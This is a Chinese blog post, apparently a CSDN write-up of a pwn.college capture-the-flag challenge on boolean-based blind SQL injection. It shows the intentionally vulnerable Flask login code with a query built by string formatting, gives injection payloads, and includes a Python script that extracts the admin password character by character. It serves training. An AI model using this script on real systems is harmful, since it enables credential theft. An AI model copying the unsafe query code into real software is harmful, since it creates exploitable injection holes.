PWN College 关于sql盲注

最新推荐文章于 2024-09-30 20:06:25 发布
最新推荐文章于 2024-09-30 20:06:25 发布
阅读量334 收藏
点赞数 2
文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TianxiaZhu824/article/details/142314590
版权

在这个场景中,我们需要利用SQL注入漏洞来泄露flag,但是应用程序并不会直接返回查询结果。相反,我们需要根据应用程序的行为差异(登录成功与否)来推断查询结果。这就是所谓的"布尔盲注"(Boolean-based Blind SQL Injection)。

我们可以通过构造一系列的"是/否"问题,并根据应用程序的响应来逐位获取flag。

服务器的处理逻辑如下所示:

#!/opt/pwn.college/python

import tempfile
import sqlite3
import flask
import os

app = flask.Flask(__name__)

class TemporaryDB:
    def __init__(self):
        self.db_file = tempfile.NamedTemporaryFile("x", suffix=".db")

    def execute(self, sql, parameters=()):
        connection = sqlite3.connect(self.db_file.name)
        connection.row_factory = sqlite3.Row
        cursor = connection.cursor()
        result = cursor.execute(sql, parameters)
        connection.commit()
        return result

db = TemporaryDB()
# https://www.sqlite.org/lang_createtable.html
db.execute("""CREATE TABLE users AS SELECT "admin" AS username, ? as password""", [open("/flag").read()])
# https://www.sqlite.org/lang_insert.html
db.execute("""INSERT INTO users SELECT "guest" as username, "password" as password""")

@app.route("/", methods=["POST"])
def challenge_post():
    username = flask.request.form.get("username")
    password = flask.request.form.get("password")
    if not username:
        flask.abort(400, "Missing `username` form parameter")
    if not password:
        flask.abort(400, "Missing `password` form parameter")

    try:
        # https://www.sqlite.org/lang_select.html
        query = f'SELECT rowid, * FROM users WHERE username = "{username}" AND password = "{password}"'
        print(f"DEBUG: {query=}")
        user = db.execute(query).fetchone()
    except sqlite3.Error as e:
        flask.abort(500, f"Query: {query}\nError: {e}")

    if not user:
        flask.abort(403, "Invalid username or password")

    flask.session["user"] = username
    return flask.redirect(flask.request.path)

@app.route("/", methods=["GET"])
def challenge_get():
    if not (username := flask.session.get("user", None)):
        page = "<html><body>Welcome to the login service! Please log in as admin to get the flag."
    else:
        page = f"<html><body>Hello, {username}!"

    return page + """
        <hr>
        <form method=post>
        User:<input type=text name=username>Pass:<input type=text name=password><input type=submit value=Submit>
        </form>
        </body></html>
    """

app.secret_key = os.urandom(8)
port = 8080 if os.geteuid() else 80
app.config['SERVER_NAME'] = f"challenge.localhost:{port}"
app.run("challenge.localhost", port)

这里我们需要构造合适的payload:  

admin"--

-- 注释掉查询的剩余部分

整个查询会变成:

SELECT rowid, * FROM users WHERE username = "admin"--" AND password = "anything"

进一步得到

SELECT rowid, * FROM users WHERE username = "admin" AND substr((SELECT password FROM users WHERE username="admin"), 1, 1) = "a"--" AND password = "anything"

构造脚本逐字符猜测

import requests
import string

url = "http://challenge.localhost:8080"
flag = ""
charset = string.printable.strip()

def check(payload):
    response = requests.post(url, data={"username": payload, "password": "anything"}, allow_redirects=False)
    return response.status_code == 302

# 获取flag长度
for i in range(1, 100):
    payload = f'admin" AND length((SELECT password FROM users WHERE username="admin")) = {i}--'
    if check(payload):
        print(f"Flag length: {i}")
        flag_length = i
        break

# 获取flag内容
for i in range(1, flag_length + 1):
    for char in charset:
        payload = f'admin" AND substr((SELECT password FROM users WHERE username="admin"), {i}, 1) = "{char}"--'
        if check(payload):
            flag += char
            print(f"Current flag: {flag}")
            break

print(f"Final flag: {flag}")

TianxiaZhu824
关注
pwncollege:部署pwn.college
02-24
大学该存储库具有部署pwn.college实例所需的工件。设置docker build -t pwncollege_challenge containers/pwncollege_challengecp -r CTFd-pwn-college-plugin CTFd/CTFd/pluginsdocker-compose up -ddocker run --...
挑战:一组预先生成的pwn.college挑战
03-03
设置将替换为实例的名称: ./generate_sql.sh | docker exec -i < INSTANCE> _db mysql -uctfd -pctfd -Dctfd警告当前存在一个问题,其中在pwn.college基础结构中,docker映像名称只能为32个字节长。 为了解决这个...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
sql server每天定时执行sql语句
doubleintfloat的博客
09-27 376
2、鼠标右击【SQL Server 代理】,选择【启动(S)】,如已启动,可以省略此步骤;3、右键,新建-》作业,在作业上-》新建作业,然后在作业上右键-》属性。1、打开SQL Server Management Studio。结果如下 , 定时每个10秒向数据库里插入一条数据。作业名称,数据库语句。
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 265
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
SQL 查询优化与实战
qq_63170044的博客
09-26 916
SQL 查询优化不仅仅是提高系统性能的重要手段,更是确保数据库在高并发环境下稳定运行的核心技能。通过合理使用索引、优化。
渗透测试工具 sqlmap 基础教程
2301_77160226的博客
09-25 740
一旦发现漏洞,sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
PostgreSQL 17新特性merge语法增强
zxrhhm的博客
09-27 479
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
Alembic使用 (SqlAlchemy)
JacinLee的博客
09-30 546
Fastapi 使用ORM 使用的是SqlAlchemy,这里使用alembic进行数据库文件迁移与数据库迁移。
SQL 简介
wjs2024的博客
09-25 562
SQL还可以用于定义和修改数据库结构。创建表:使用CREATE TABLE语句创建新表。修改表:使用ALTER TABLE语句修改表的结构。删除表:使用DROP TABLE语句删除表。SQL是数据库管理的重要工具,对于数据管理和分析至关重要。掌握SQL不仅有助于提高工作效率,还能更好地理解和处理数据。随着大数据和数据分析的不断发展,SQL的重要性也将日益增加。
等保2.0数据库测评之SQL server数据库测评
2401_84434570的博客
09-26 1208
SQL server美国Microsoft公司推出的一种关系型数据库系统。SQL Server是一个可扩展的、高性能的、为分布式客户机/服务器计算所设计的数据库管理系统。本次安装环境为Windows10专业版操作系统,数据库版本为Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) ,单机部署过程比较简单就不在此进行讲解。本文针对SQL server等保测评进行实际操作,不妥之处还恳请留言指正,共同学习。二、等保测评身份鉴别。
【技术文章】PostgreSQL分区表
程序人生的博客
09-27 667
这样做的好处是可以将预先填充好数据的表作为分区快速加入到分区表体系中,或者在需要调整分区布局时将一个表转换为分区表的分区。• new_partition_table:要作为分区添加的已存在的表名,该表应具有与partitioned_table相同的结构,并且其数据应符合所指定的分区范围。假设有一个按年份分区的销售表sales,现在有一张名为sales_2024的表,里面存储了2024年的销售数据,希望将其作为sales表的一个分区。在执行这些操作时,应确保没有正在进行的事务依赖于被操作的分区。
sql-labs:42~65
最新发布
anddddoooo的博客
09-30 709
sort=1' and if(1=1,sleep(0.05),1) and '1'='1 # 单引号闭合。sort=1' and if(1=1,sleep(0.05),1) and '1'='1 # 单引号闭合。id=1' and if(1=1,sleep(1),1) and '1'='1 # 单引号闭合。
nginx+php+postgresql搭建漏洞靶场
宇宙第一小趴菜的博客
09-27 809
Nginx 本身不处理 PHP 代码,它通常与 PHP-FPM(FastCGI 进程管理器)一起使用来处理 PHP 请求。PHP-FPM 是一个用于处理 PHP 代码的高性能、独立的 FastCGI 实现,并且它与 Nginx 配合得非常好。当 Nginx 接收到一个请求,需要处理 PHP 代码时,它会将请求转发给 PHP-FPM。PHP-FPM 然后启动一个 PHP 进程来处理请求,并将结果返回给 Nginx,Nginx 再将结果发送给客户端。文件中,找到数据库连接部分并修改为你的数据库信息。
Leecode_SQL50_1280. Students and Examinations
-
09-25 1081
注意一定要选择 a.subject_name!因为只有这个表是全的。若选择错了,有人的 subject_name 会是 null.用 CROSS JOIN 获取所有学生和科目的组合,不用有相同的列来 JOIN ON.
SQL常用数据过滤 - EXISTS运算符
qq_36608622的博客
09-26 363
用于检查查询子句是否存在满足特定条件的记录,如果有一条或者多条记录存在,则返回True,否则返回False。EXISTS 直接跟在WHERE关键字之后,中间没有列名;子查询查询结果有一条或多条记录,则返回True。EXISTS后面接子查询;这里通过2张进行举例,
这次PostgreSQL事故后,我把表膨胀清理工具撸了一遍
IT邦德
09-30 424
接下来,给大家介绍一下,常用的三种表膨胀处理的PostgreSQL插件工具
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值